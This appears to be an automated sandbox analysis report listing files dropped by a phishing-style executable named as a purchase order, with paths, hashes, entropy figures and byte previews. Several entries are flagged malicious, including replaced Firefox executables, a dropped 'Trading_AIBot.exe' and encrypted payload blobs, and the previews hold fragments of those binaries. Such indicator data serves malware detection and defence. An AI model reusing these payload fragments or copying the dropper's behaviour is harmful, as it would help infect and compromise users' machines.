Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1344000
Entropy (8bit):	6.80834621013256
Encrypted:	false
SSDEEP:	24576:AC1vpgXcZHznsqjnhMgeiCl7G0nehbGZpbD:AC1vpIcN7Dmg27RnWGj
MD5:	B01F91AFC327CFDED320D3678A583409
SHA1:	A900A13BC6B7723877E1DB2C346B71CC84D5237B
SHA-256:	5CDCF6ED5A64C91127D96196E26FBB48D2D5D1623E0A99F528F7A3BAD00B0C58
SHA-512:	FA8A7DE0BB3C9A63C87C1DAA167CF0AD8130628DF59EB09EEE4B1F08C299C2BD15340770E5754F0B0A17552B8AA2A9C75B4EA74A7B5DB2C72E30D6CA233A4223
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......T...H......0..........@......................................... .........................................................................................T........................r..(....p..8...............`............................text...fS.......T.................. ..`.rdata.......p.......X..............@..@.data....2...@...,..."..............@....pdata...............N..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl..............h...................rsrc................j..............@..@.reloc... ...........r..............@...................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\pingsender.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1200128
Entropy (8bit):	5.140020048157583
Encrypted:	false
SSDEEP:	12288:zSwjDXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:zvDsqjnhMgeiCl7G0nehbGZpbD
MD5:	19731DBF5C3CEA3602981318C81F0684
SHA1:	A0140A21BE665DE98DBC679A76EBF1284D46F3BA
SHA-256:	F69D93E72AB84056909EE3777C0C55BC38E26B5C220646B38A59D8FF3EBB1489
SHA-512:	5910C7236944ADA933B30E54A7CAF4CAA65F488EF5976169DB417F4FF589D64CAE8783B46A030129E9A3AF30CA81578E9E7B61D41AC9B3429E69B186A6A3B3B6
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."..........b......`..........@.....................................[.... ..........................................................`....... .. ...................t...........................(.......8............................................text............................... ..`.rdata..dM.......N..................@..@.data...............................@....pdata.. .... ......................@..@.00cfg..(....0......................@..@.tls.........@......................@....voltbl......P...........................rsrc........`......................@..@.reloc...P...p...@..................@...................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\plugin-container.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1408512
Entropy (8bit):	5.4411507731359245
Encrypted:	false
SSDEEP:	24576:nWKntIfGpxsqjnhMgeiCl7G0nehbGZpbD:W8IeDDmg27RnWGj
MD5:	95E97183B4AD28CE77BAE3413982BFD3
SHA1:	3859441A2EF3F8D41D8E1697328BEC8C7FFCD13F
SHA-256:	03C18A44BE9A7F3272329F9E74B72DDF90AE61FCF527F794041663CE3AC913F6
SHA-512:	7D556B31FDF55B83662D41EA831164766525739F2F5EE630D718C1A680E34E01180174FCB7175027A82F4BEEE329DBC5893D930E4C96586CBC6DCA35FDE7B460
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......~.....................@.....................................v.... .....................................................@.......P....P.................................................(... ...8...................8........................text...w}.......~.................. ..`.rdata..,...........................@..@.data...0%... ......................@....pdata.......P......................@..@.00cfg..(....p.......*..............@..@.tls.................,..............@....voltbl..................................rsrc...P............0..............@..@.reloc...P.......@...>..............@...................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\private_browsing.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1185280
Entropy (8bit):	5.103285786855056
Encrypted:	false
SSDEEP:	12288:5Ih/Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:E/sqjnhMgeiCl7G0nehbGZpbD
MD5:	3537761672E893692C7B7B8B9E80B66C
SHA1:	5EFE5D1C8CEB4DC4FE709B109E11F1292878BE45
SHA-256:	7486E984239780529BA67900898EF8F591F4120F73D9C0676AA0218343CEA48F
SHA-512:	F15BABAF68C3B19220D0E7367E41EA8B8CC207481FFCE044D45CB7BF9060F4AAFCA853A354E734164B6A2EAF9018D7F768BB1F424E1C997A428416AAD11A3DEF
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e..........".................p..........@.......................................... ..................................................6...............`..4....................5..............................`0..8............:..H............................text............................... ..`.rdata.......0......."..............@..@.data........P.......8..............@....pdata..4....`.......:..............@..@.00cfg..(....p.......>..............@..@.voltbl..............@...................rsrc................B..............@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\updater.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1531904
Entropy (8bit):	5.421205929530571
Encrypted:	false
SSDEEP:	24576:R8oREwt2ioQ3J+ROsqjnhMgeiCl7G0nehbGZpbD:R8oRpoFiDmg27RnWGj
MD5:	E98F61506AF26B0BCECED1628DDCFB9D
SHA1:	02A85B08FBA6D1C5AE268406C0D9A6FFE1322CB3
SHA-256:	C772D87B20C3CCFAADAE7710434A9FFE1777B097C646D39E38E040D430E1E194
SHA-512:	78DE1CEC2B065B6083C81976C7750E799A46547BF6DF01D3AE1F276940770A7A8330FA02D9CD7171FA3593241AA86D66EAABC6C94ACAF46F96BEB65174215CF7
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......N...........B.........@.....................................w.... ..................................................;.......0..X~....... ...................6..........................(....`..8...........0B..H...H9..`....................text....L.......N.................. ..`.rdata.......`.......R..............@..@.data....>...........h..............@....pdata... ......."...v..............@..@.00cfg..(...........................@..@.tls................................@....voltbl.<..............................._RDATA....... ......................@..@.rsrc...X~...0......................@..@.reloc...P.......@... ..............@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe

Download File

Process:	C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1851904
Entropy (8bit):	7.517430962460623
Encrypted:	false
SSDEEP:	24576:Otb20pfaCqT5TBWgNQ7aDEgJ+y+wn4DocDtE6AE5sqjnhMgeiCl7G0nehbGZpbD:7Yg5tQ7aDEPy+wn47DK5qDmg27RnWGj
MD5:	33FFA6B9A3022156B4592E17F1A9A074
SHA1:	8EC7BEB8A9BB5C5FDF769698EA2ABF553E6A655D
SHA-256:	B336830D627101633DB934F8D48606639C70D133A5985026BC250C035E887FAF
SHA-512:	046BB90347BAF7FB63536EB0B527E8BF881DB5220617AD4E679B4123FC5D81363F2ED98CCC966C19197DB68261783C6C9D332CE9EC45645065D80935886F25BE
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d...........'.a....H.k....H.h.....H.i....}%....}5............~.......k......o.....1......j....Rich....................PE..L....d@g..........".................t_............@.................................Y.........@.......@......................p..\|....@..H...........................................................0'..@...............`............................text...O........................... ..`.rdata..B...........................@..@.data...T........b..................@....rsrc...H....@......................@..@.reloc....... ......................@...................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	520
Entropy (8bit):	5.355496254154943
Encrypted:	false
SSDEEP:	12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLUE4K5E4KlKDE4KhKiKhk
MD5:	3C255C75EA6EB42410894C0D08A4E324
SHA1:	34B3512313867B269C545241CD502B960213293A
SHA-256:	116B1D2FF17BE7FE8C4B6D935688F81C40716AFCD995C76BFC2D1AB2AFA774A7
SHA-512:	41406D84C3FC3D5EFAD22277382D9ADC444D00FDE95C1B7B6BC17E80452CA5DE084D28D892BC0C6890FE64DC733790E26D0F62FE3477175DCCCAC777FDE5E7EC
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379677338874509
Encrypted:	false
SSDEEP:	48:tWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMugeC/ZPUyus:tLHxvIIwLgZ2KRHWLOug8s
MD5:	AAC9B2CC385B2595E11AAF60C4652279
SHA1:	5F14BE9EC829371BFAC9DDBF97BF156C13E03341
SHA-256:	0C17939EA24BBFE7F727AFB0FABC5BAFC8F2A8A5218BC9B2A7580A54B510EC84
SHA-512:	3BC9F81C7C9FD417B7F486550EBBE95CF4BA5408E013AB11FA54400F49DB8ACDAD5EE28C95278DACF62E6FDB30071D193EED741616C91E48F9A2ADC92EAAB257
Malicious:	false
Reputation:	unknown
Preview:	@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70656
Entropy (8bit):	4.910353963160109
Encrypted:	false
SSDEEP:	1536:ZPqWETbZazuYx3cOBB03Cmp3gGLWUTbUwjKX4C2b+d:ZizbZazunOKrp3gGhTbUwjI4C2Sd
MD5:	E91A1DB64F5262A633465A0AAFF7A0B0
SHA1:	396E954077D21E94B7C20F7AFA22A76C0ED522D0
SHA-256:	F19763B48B2D2CC92E61127DD0B29760A1C630F03AD7F5055FD1ED9C7D439428
SHA-512:	227D7DAD569D77EF84326E905B7726C722CEFF331246DE4F5CF84428B9721F8B2732A31401DF6A8CEF7513BCD693417D74CDD65D54E43C710D44D1726F14B0C5
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............n)... ...@....@.. ....................................`..................................)..W....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........>...............=..p...........................................".(!......s3...z...s..........(.....Z~ ...oK...~....(!.....(5....&.(!.....".......".(u....Vs....(v...t.........&..(.....Br...p(.....(....sL....).......0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_linbsbhg.2cm.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m2xxpask.vt5.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xv5kgsx1.eip.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z3xpkf2j.1ts.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\aut7AD4.tmp

Download File

Process:	C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe
File Type:	StarOffice Gallery theme TEHACJZJ\256\316EE\375P4L9IZD\007WEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP\324L9IT[\375YE\374H\212k\342K\035\374d\021-9GlI;5#56(h"&$4%%\021' e"A"\031 4d\003\030\026h,(.?d\<OaEP4L9IZ,W, 2110219414 objects, 1st >\266\276\270\311\236F\017\362\211\211\211\234\370\200j\037\321\264t\214\300\276N\303\354ZJQ\261;\0312_\261\3209IZ\315\031S\022\305%cJ\345J\0211En;@@h\262\017\032\317\011\037\025\037+F\033\262\25061E\306\201@\017\213L \321\022\017\336\023D\206\001ZZ
Category:	dropped
Size (bytes):	345600
Entropy (8bit):	7.924466320417484
Encrypted:	false
SSDEEP:	6144:FKaFQX5Ww5c0otBSF41oK+R+Ayrn8VUYcgHPWcxrVlqUdgCdX/fi0uolmaObG/CU:FKB5b2nBS41oK+R+xg3ZHPFlIm/qEzBd
MD5:	51E866564694747435D2C707254F6500
SHA1:	7FEF0E2DD8476BF3F61E7D8D331AC755AED8BA54
SHA-256:	41A60725A3EAF4699984C16A7F5EA639961677B994A96540D4C9FE0EE0641506
SHA-512:	987B9C306A2B53F2E4F02B8BB363290503BA91DCBB0C9D46AE4677528383C9885BC7C5964D32EC68BE14BE3E47DA84BBF7CC479BC583C65B76BE4B394AC2D588
Malicious:	true
Reputation:	unknown
Preview:	...GTEHACJZJ..EE.P4L9IZD.WEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP.L9IT[.YE.H.k.K..d.-9GlI;5#56(h"&$4%%.' e"A". 4d...h,(.?d\<OaEP4L9IZ,W.hd0.4v;.Oi4...oF7e5.)N..9a+./.4.;.E.G{y*9K4.?ui34.@.;wsO2.8.:.>& m6.$JQ1EEEP4L9IZDGWEd.x-ZJQ1..EPxM=I..G.EHAGJZJQ.EfD[5E9I.EGW.KAGJZJ~.EEE@4L9.[DGW.HAWJZJS1E@EP4L9IZAGWEHAGJZ.T1EAEP.w;IXDG.EHQGJJJQ1EUEP$L9IZDGGEHAGJZJQ1EE.E6LiIZDG7GHmcIZJQ1EEEP4L9IZDGWEHAGJZJQ1..DP(L9IZDGWEHAGJZJQ1EEEP4L9IZDG.HJA.JZJQ1EEEP4L9.[D.VEHAGJZJQ1EEEP4L9IZDGWEHAGJt>4I1EEP,.8IZTGWE.@GJ^JQ1EEEP4L9IZDGwEH!i8>+%PEE.=4L9.[DG9EHA.KZJQ1EEEP4L9IZ.GW.f%&>;JQ1.uEP4l;IZRGWEBCGJZJQ1EEEP4L9.ZD.y7;3$JZJ}.FEE06L9oYDGwGHAGJZJQ1EEEP4.9I.DGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ

C:\Users\user\AppData\Local\Temp\aut81E9.tmp

Download File

Process:	C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe
File Type:	StarOffice Gallery theme TEHACJZJ\256\316EE\375P4L9IZD\007WEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP\324L9IT[\375YE\374H\212k\342K\035\374d\021-9GlI;5#56(h"&$4%%\021' e"A"\031 4d\003\030\026h,(.?d\<OaEP4L9IZ,W, 2110219414 objects, 1st >\266\276\270\311\236F\017\362\211\211\211\234\370\200j\037\321\264t\214\300\276N\303\354ZJQ\261;\0312_\261\3209IZ\315\031S\022\305%cJ\345J\0211En;@@h\262\017\032\317\011\037\025\037+F\033\262\25061E\306\201@\017\213L \321\022\017\336\023D\206\001ZZ
Category:	dropped
Size (bytes):	345600
Entropy (8bit):	7.924466320417484
Encrypted:	false
SSDEEP:	6144:FKaFQX5Ww5c0otBSF41oK+R+Ayrn8VUYcgHPWcxrVlqUdgCdX/fi0uolmaObG/CU:FKB5b2nBS41oK+R+xg3ZHPFlIm/qEzBd
MD5:	51E866564694747435D2C707254F6500
SHA1:	7FEF0E2DD8476BF3F61E7D8D331AC755AED8BA54
SHA-256:	41A60725A3EAF4699984C16A7F5EA639961677B994A96540D4C9FE0EE0641506
SHA-512:	987B9C306A2B53F2E4F02B8BB363290503BA91DCBB0C9D46AE4677528383C9885BC7C5964D32EC68BE14BE3E47DA84BBF7CC479BC583C65B76BE4B394AC2D588
Malicious:	false
Reputation:	unknown
Preview:	...GTEHACJZJ..EE.P4L9IZD.WEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP.L9IT[.YE.H.k.K..d.-9GlI;5#56(h"&$4%%.' e"A". 4d...h,(.?d\<OaEP4L9IZ,W.hd0.4v;.Oi4...oF7e5.)N..9a+./.4.;.E.G{y*9K4.?ui34.@.;wsO2.8.:.>& m6.$JQ1EEEP4L9IZDGWEd.x-ZJQ1..EPxM=I..G.EHAGJZJQ.EfD[5E9I.EGW.KAGJZJ~.EEE@4L9.[DGW.HAWJZJS1E@EP4L9IZAGWEHAGJZ.T1EAEP.w;IXDG.EHQGJJJQ1EUEP$L9IZDGGEHAGJZJQ1EE.E6LiIZDG7GHmcIZJQ1EEEP4L9IZDGWEHAGJZJQ1..DP(L9IZDGWEHAGJZJQ1EEEP4L9IZDG.HJA.JZJQ1EEEP4L9.[D.VEHAGJZJQ1EEEP4L9IZDGWEHAGJt>4I1EEP,.8IZTGWE.@GJ^JQ1EEEP4L9IZDGwEH!i8>+%PEE.=4L9.[DG9EHA.KZJQ1EEEP4L9IZ.GW.f%&>;JQ1.uEP4l;IZRGWEBCGJZJQ1EEEP4L9.ZD.y7;3$JZJ}.FEE06L9oYDGwGHAGJZJQ1EEEP4.9I.DGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ

C:\Users\user\AppData\Local\Temp\aut8C49.tmp

Download File

Process:	C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe
File Type:	StarOffice Gallery theme TEHACJZJ\256\316EE\375P4L9IZD\007WEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP\324L9IT[\375YE\374H\212k\342K\035\374d\021-9GlI;5#56(h"&$4%%\021' e"A"\031 4d\003\030\026h,(.?d\<OaEP4L9IZ,W, 2110219414 objects, 1st >\266\276\270\311\236F\017\362\211\211\211\234\370\200j\037\321\264t\214\300\276N\303\354ZJQ\261;\0312_\261\3209IZ\315\031S\022\305%cJ\345J\0211En;@@h\262\017\032\317\011\037\025\037+F\033\262\25061E\306\201@\017\213L \321\022\017\336\023D\206\001ZZ
Category:	dropped
Size (bytes):	345600
Entropy (8bit):	7.924466320417484
Encrypted:	false
SSDEEP:	6144:FKaFQX5Ww5c0otBSF41oK+R+Ayrn8VUYcgHPWcxrVlqUdgCdX/fi0uolmaObG/CU:FKB5b2nBS41oK+R+xg3ZHPFlIm/qEzBd
MD5:	51E866564694747435D2C707254F6500
SHA1:	7FEF0E2DD8476BF3F61E7D8D331AC755AED8BA54
SHA-256:	41A60725A3EAF4699984C16A7F5EA639961677B994A96540D4C9FE0EE0641506
SHA-512:	987B9C306A2B53F2E4F02B8BB363290503BA91DCBB0C9D46AE4677528383C9885BC7C5964D32EC68BE14BE3E47DA84BBF7CC479BC583C65B76BE4B394AC2D588
Malicious:	true
Reputation:	unknown
Preview:	...GTEHACJZJ..EE.P4L9IZD.WEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP.L9IT[.YE.H.k.K..d.-9GlI;5#56(h"&$4%%.' e"A". 4d...h,(.?d\<OaEP4L9IZ,W.hd0.4v;.Oi4...oF7e5.)N..9a+./.4.;.E.G{y*9K4.?ui34.@.;wsO2.8.:.>& m6.$JQ1EEEP4L9IZDGWEd.x-ZJQ1..EPxM=I..G.EHAGJZJQ.EfD[5E9I.EGW.KAGJZJ~.EEE@4L9.[DGW.HAWJZJS1E@EP4L9IZAGWEHAGJZ.T1EAEP.w;IXDG.EHQGJJJQ1EUEP$L9IZDGGEHAGJZJQ1EE.E6LiIZDG7GHmcIZJQ1EEEP4L9IZDGWEHAGJZJQ1..DP(L9IZDGWEHAGJZJQ1EEEP4L9IZDG.HJA.JZJQ1EEEP4L9.[D.VEHAGJZJQ1EEEP4L9IZDGWEHAGJt>4I1EEP,.8IZTGWE.@GJ^JQ1EEEP4L9IZDGwEH!i8>+%PEE.=4L9.[DG9EHA.KZJQ1EEEP4L9IZ.GW.f%&>;JQ1.uEP4l;IZRGWEBCGJZJQ1EEEP4L9.ZD.y7;3$JZJ}.FEE06L9oYDGwGHAGJZJQ1EEEP4.9I.DGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ

C:\Users\user\AppData\Local\Temp\autB491.tmp

Download File

Process:	C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe
File Type:	StarOffice Gallery theme TEHACJZJ\256\316EE\375P4L9IZD\007WEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP\324L9IT[\375YE\374H\212k\342K\035\374d\021-9GlI;5#56(h"&$4%%\021' e"A"\031 4d\003\030\026h,(.?d\<OaEP4L9IZ,W, 2110219414 objects, 1st >\266\276\270\311\236F\017\362\211\211\211\234\370\200j\037\321\264t\214\300\276N\303\354ZJQ\261;\0312_\261\3209IZ\315\031S\022\305%cJ\345J\0211En;@@h\262\017\032\317\011\037\025\037+F\033\262\25061E\306\201@\017\213L \321\022\017\336\023D\206\001ZZ
Category:	dropped
Size (bytes):	345600
Entropy (8bit):	7.924466320417484
Encrypted:	false
SSDEEP:	6144:FKaFQX5Ww5c0otBSF41oK+R+Ayrn8VUYcgHPWcxrVlqUdgCdX/fi0uolmaObG/CU:FKB5b2nBS41oK+R+xg3ZHPFlIm/qEzBd
MD5:	51E866564694747435D2C707254F6500
SHA1:	7FEF0E2DD8476BF3F61E7D8D331AC755AED8BA54
SHA-256:	41A60725A3EAF4699984C16A7F5EA639961677B994A96540D4C9FE0EE0641506
SHA-512:	987B9C306A2B53F2E4F02B8BB363290503BA91DCBB0C9D46AE4677528383C9885BC7C5964D32EC68BE14BE3E47DA84BBF7CC479BC583C65B76BE4B394AC2D588
Malicious:	false
Reputation:	unknown
Preview:	...GTEHACJZJ..EE.P4L9IZD.WEHAGJZJQ1EEEP4L9IZDGWEHAGJZJQ1EEEP.L9IT[.YE.H.k.K..d.-9GlI;5#56(h"&$4%%.' e"A". 4d...h,(.?d\<OaEP4L9IZ,W.hd0.4v;.Oi4...oF7e5.)N..9a+./.4.;.E.G{y*9K4.?ui34.@.;wsO2.8.:.>& 